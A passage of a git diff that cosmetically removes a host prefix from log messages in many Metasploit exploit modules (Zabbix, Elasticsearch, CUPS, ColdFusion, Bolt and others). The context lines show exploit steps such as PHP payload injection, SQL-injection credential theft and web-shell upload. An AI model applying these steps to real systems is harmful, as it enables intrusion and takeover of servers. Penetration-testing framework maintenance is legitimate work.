"#{hit['path']}/#{hit['name']}" - print_warning("#{peer} - Restoring #{filename}") + print_warning("Restoring #{filename}") client.fs.file.rm(filename) fd = client.fs.file.new(filename, "wb") fd.write(currencies_php) fd.close end - print_status("#{peer} - Cleanup finished") + print_status("Cleanup finished") end @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote stub = "\0'));#{payload.encoded}?>" - print_status("#{peer} - Injecting the PHP payload") + print_status("Injecting the PHP payload") response = send_request_cgi({ 'uri' => normalize_uri(uri, "converter.php"), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Executing the PHP payload") + print_status("Executing the PHP payload") timeout = 0.01 response = send_request_cgi({ diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 73ae05f5fa..782c427555 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 - vprint_status("#{peer} - Zabbix version #{version} detected") + vprint_status("Zabbix version #{version} detected") else # If this fails, guest access may not be enabled - vprint_status("#{peer} - Unable to access httpmon.php") + vprint_status("Unable to access httpmon.php") return Exploit::CheckCode::Unknown end @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/ session = $1 - print_status("#{peer} - Extracted session cookie - [ #{session} ]") + print_status("Extracted session cookie - [ #{session} ]") return session else fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session") @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote @sid = "#{@session[16..-1]}" script_name = rand_text_alpha(8) # Upload script - print_status("#{peer} - Attempting to inject payload") + print_status("Attempting to inject payload") res = send_request_cgi({ 'method' => 'POST', 'cookie' => "zbx_sessionid=#{@session}", @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script added)/ - print_status("#{peer} - Payload injected successfully") + print_status("Payload injected successfully") else fail_with(Failure::Unknown, "#{peer} - Payload injection failed!") end @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)" - print_status("#{peer} - Cleaning script remnants") + print_status("Cleaning script remnants") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -173,9 +173,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script deleted)/ - print_status("#{peer} - Script removed successfully") + print_status("Script removed successfully") else - print_warning("#{peer} - Unable to remove script #{@scriptid}") + print_warning("Unable to remove script #{@scriptid}") end end end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 9a3a544ed4..1097a5e7bf 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from config file - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/config/global.conf' @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote lines = rand(100) + 1 # send payload - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") + print_status("Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ 'uri' => '/index.cgi', diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 30baf11724..3a728421f4 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Save @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}" # send payload - print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)") + print_status("Sending payload to Zenoss (#{command.length.to_s} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -94,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "#{postdata}", }) if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/ - print_error("#{peer} - Authentication failed. Incorrect username/password.") + print_error("Authentication failed. Incorrect username/password.") return end - print_status("#{peer} - Sent payload successfully") + print_status("Sent payload successfully") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") rescue - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end handler diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 7ee164b10b..2376559d8d 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo #{clue}" connect - vprint_status("#{peer} - Sending 'Command' request...") + vprint_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 - vprint_good("#{peer} - Node ID #{node_id} discovered") + vprint_good("Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retry with the good node_id connect - vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...") + vprint_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ @@ -117,16 +117,16 @@ class Metasploit3 < Msf::Exploit::Remote cmd = payload.encoded connect - print_status("#{peer} - Sending 'Command' request...") + print_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /-1/ and res=~ /NODE (\d*)/ # Retry with the good node_id node_id = $1 - print_good("#{peer} - Node ID #{node_id} discovered") + print_good("Node ID #{node_id} discovered") connect - print_status("#{peer} - Sending 'Command' request with discovered Node ID...") + print_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect end @@ -134,10 +134,10 @@ class Metasploit3 < Msf::Exploit::Remote # Read command output from socket if cmd/unix/generic payload was used if (datastore['CMD']) if res and res =~ /\x30\xad/ - print_good("#{peer} - Command executed successfully") + print_good("Command executed successfully") print_status("Output:\n#{res.split("\x30\xad").last}") else - print_error("#{peer} - Failed to execute the command") + print_error("Failed to execute the command") end end diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index 5cb602e0b1..cbfa6a463a 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -97,7 +97,7 @@ class Metasploit4 < Msf::Exploit::Remote rescue peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Caught #{$!.class}: #{$!.message}") + vprint_status("Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index d6fb488e75..685a0ae6d7 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -65,30 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to execute arbitrary Java...") + print_status("Trying to execute arbitrary Java...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else # TODO: It'd be nice to report_host() with this info. - print_good("#{peer} - Remote OS is '#{result}'") + print_good("Remote OS is '#{result}'") end jar_file = "" if result =~ /win/i - print_status("#{peer} - Discovering TEMP path") + print_status("Discovering TEMP path") res = execute(java_tmp_dir) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path identified: '#{result}'") + print_good("TEMP path identified: '#{result}'") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else @@ -102,18 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'System.getProperty("java.class.path")' - vprint_status("#{peer} - Trying to execute 'System.getProperty(\"java.version\")'...") + vprint_status("Trying to execute 'System.getProperty(\"java.version\")'...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - No results for the Java test") + vprint_status("No results for the Java test") return false elsif result =~ /elasticsearch/ - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return true else - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return false end end diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index 376acef76a..22409cadca 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -63,27 +63,27 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking vulnerability...") + print_status("Checking vulnerability...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering TEMP path...") + print_status("Discovering TEMP path...") res = execute(java_tmp_dir) tmp_dir = parse_result(res) if tmp_dir.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path on '#{tmp_dir}'") + print_good("TEMP path on '#{tmp_dir}'") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) os = parse_result(res) if os.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else - print_good("#{peer} - Remote OS is '#{os}'") + print_good("Remote OS is '#{os}'") end if os =~ /win/i @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(tmp_file) - print_status("#{peer} - Trying to load metasploit payload...") + print_status("Trying to load metasploit payload...") java = java_load_class(os, tmp_file) execute(java) end @@ -102,12 +102,12 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'java.lang.Math.class.forName("java.lang.Runtime")' - vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") + vprint_status("Trying to get a reference to java.lang.Runtime...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - no response to test") + vprint_status("no response to test") return false elsif result == 'class java.lang.Runtime' return true @@ -118,12 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_result(res) unless res - vprint_error("#{peer} - No response") + vprint_error("No response") return nil end unless res.code == 200 && res.body - vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") + vprint_error("Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") return nil end diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index eae0dc278f..5899e09be6 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_status("#{peer} - The server returned: #{res.code} #{res.message}") + print_status("The server returned: #{res.code} #{res.message}") m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || '' if m.empty? - print_error("#{peer} - This server may not be vulnerable") + print_error("This server may not be vulnerable") else - print_status("#{peer} - Command output from the server:") + print_status("Command output from the server:") print_line(m) end end diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 6b2f6d616e..a7a8dbd4f9 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--o0oOo0o\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"), @@ -96,11 +96,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end end diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index b7017589ee..645a337f93 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), @@ -86,14 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end - print_status("#{peer} - Requesting '#{php_fname}'...") + print_status("Requesting '#{php_fname}'...") res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index ec8b0b4797..30b5987cb4 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb +++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login'), @@ -130,17 +130,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = bolt_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Bolt.") + vprint_good("Authenticated with Bolt.") token = get_token(cookie, fname) fail_with(Failure::Unknown, 'No token found.') if token.nil? - vprint_good("#{peer} - Token \"#{token}\" found.") + vprint_good("Token \"#{token}\" found.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha_lower(10) data = Rex::MIME::Message.new @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), @@ -158,17 +158,17 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302 - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") rename = rename_payload(cookie, payload_name, fname) fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil? php_file_name = "#{payload_name}.php" payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_file_name) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 03028e468b..b3b854cee9 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") http_send_command(payload.raw) end end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index a0c6b0f4c6..348dea375a 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote war_filename = "#{app_base}.war" war_location = target['AutoDeployPath'] - print_status("#{peer} - Uploading WAR file #{war_filename}...") + print_status("Uploading WAR file #{war_filename}...") res = upload_file(war_location, war_filename, war) if res @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index bdeb327d67..758cbcf46e 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - vprint_good "#{peer} - Administrator access available" + vprint_good "Administrator access available" else return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote imghash = "596b3fc4f1a0b818979db1cf94a82220" if img == imghash - vprint_good "#{peer} - ColdFusion 9 Detected" + vprint_good "ColdFusion 9 Detected" else return Exploit::CheckCode::Safe end @@ -192,8 +192,8 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload uri = target_uri.path - print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', @@ -207,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea - print_status "#{peer} - Trying to upload payload via scheduled task..." + print_status "Trying to upload payload via scheduled task..." res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'), @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - print_good("#{peer} - Logged in as Administrator!") + print_good("Logged in as Administrator!") else fail_with(Failure::Unknown, "#{peer} - Login Failed") end @@ -259,12 +259,12 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/ file_path = $1 - print_good("#{peer} - File path disclosed! #{file_path}") + print_good("File path disclosed! #{file_path}") else fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath") end - print_status("#{peer} - Adding scheduled task") + print_status("Adding scheduled task") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'), @@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Running scheduled task") + print_status("Running scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -299,12 +299,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/ - print_good("#{peer} - Scheduled task completed successfully") + print_good("Scheduled task completed successfully") else fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Deleting scheduled task") + print_status("Deleting scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -316,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!") + print_error("Scheduled task deletion failed, cleanup might be needed!") end end end diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 399846da49..81897bc3e0 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -88,21 +88,21 @@ class Metasploit4 < Msf::Exploit::Remote printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ - vprint_status("#{peer} - Found CUPS version #{$1}") + vprint_status("Found CUPS version #{$1}") else - print_status("#{peer} - Target is not a CUPS web server") + print_status("Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ - vprint_good("#{peer} - Added printer successfully") + vprint_good("Added printer successfully") delete_printer(printer_name) elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") elsif res.code == 426 - vprint_error("#{peer} - SSL required - set SSL true") + vprint_error("SSL required - set SSL true") end Exploit::CheckCode::Detected end @@ -128,7 +128,7 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ - print_good("#{peer} - Added printer successfully") + print_good("Added printer successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 @@ -144,7 +144,7 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ - vprint_good("#{peer} - Added test page to printer queue") + vprint_good("Added test page to printer queue") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 @@ -158,13 +158,13 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ - print_status("#{peer} - Deleted printer '#{printer_name}' successfully") + print_status("Deleted printer '#{printer_name}' successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") + vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") + vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else - vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") + vprint_warning("Could not delete printer '#{printer_name}'") end end @@ -172,7 +172,7 @@ class Metasploit4 < Msf::Exploit::Remote # Add a printer to CUPS # def add_printer(printer_name, cmd) - vprint_status("#{peer} - Adding new printer '#{printer_name}'") + vprint_status("Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF @@ -241,7 +241,7 @@ EOF # Queue a printer test page # def print_test_page(printer_name) - vprint_status("#{peer} - Adding test page to printer queue") + vprint_status("Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), @@ -258,7 +258,7 @@ EOF # Delete a printer # def delete_printer(printer_name) - vprint_status("#{peer} - Deleting printer '#{printer_name}'") + vprint_status("Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 63fc450568..865ca0fbd2 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -101,17 +101,17 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' # upload PHP payload to upload/___1/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| res = upload(base, fname, php) if res.nil? - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end # retrieve and execute PHP payload - print_status("#{peer} - Retrieving file: #{fname}") + print_status("Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload/___1/#{fname}") diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 71c1b0a0c1..f999bafa7c 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -107,19 +107,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit payload_name = rand_text_alpha(rand(10) + 5) + '.php' - print_status("#{peer} - Using SQL injection to acquire credentials") + print_status("Using SQL injection to acquire credentials") user = database_get_field('users', 'name', 0) if user == false - print_error("#{peer} - Failed to acquire administrator username") + print_error("Failed to acquire administrator username") return end password = database_get_field('users', 'password', 0) if password == false - print_error("#{peer} - Failed to acquire administrator password") + print_error("Failed to acquire administrator password") end - print_status("#{peer} - Using #{user}:#{password}") + print_status("Using #{user}:#{password}") res = send_request_cgi({ 'method' => 'POST', @@ -135,9 +135,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.headers.has_key?('Location') login_cookie = res.get_cookies - print_status("#{peer} - Login successful") + print_status("Login successful") else - print_error("#{peer} - Failed to log in") + print_error("Failed to log in") return end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => upload, @@ -159,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote path = $1 path = path.sub! "\\", "/" target_path = normalize_uri(target_uri.path, path) - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler else - print_error("#{peer} - Failed to upload file") + print_error("Failed to upload file") return end end diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index d7fe87b82c..ac0adec7c5 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ 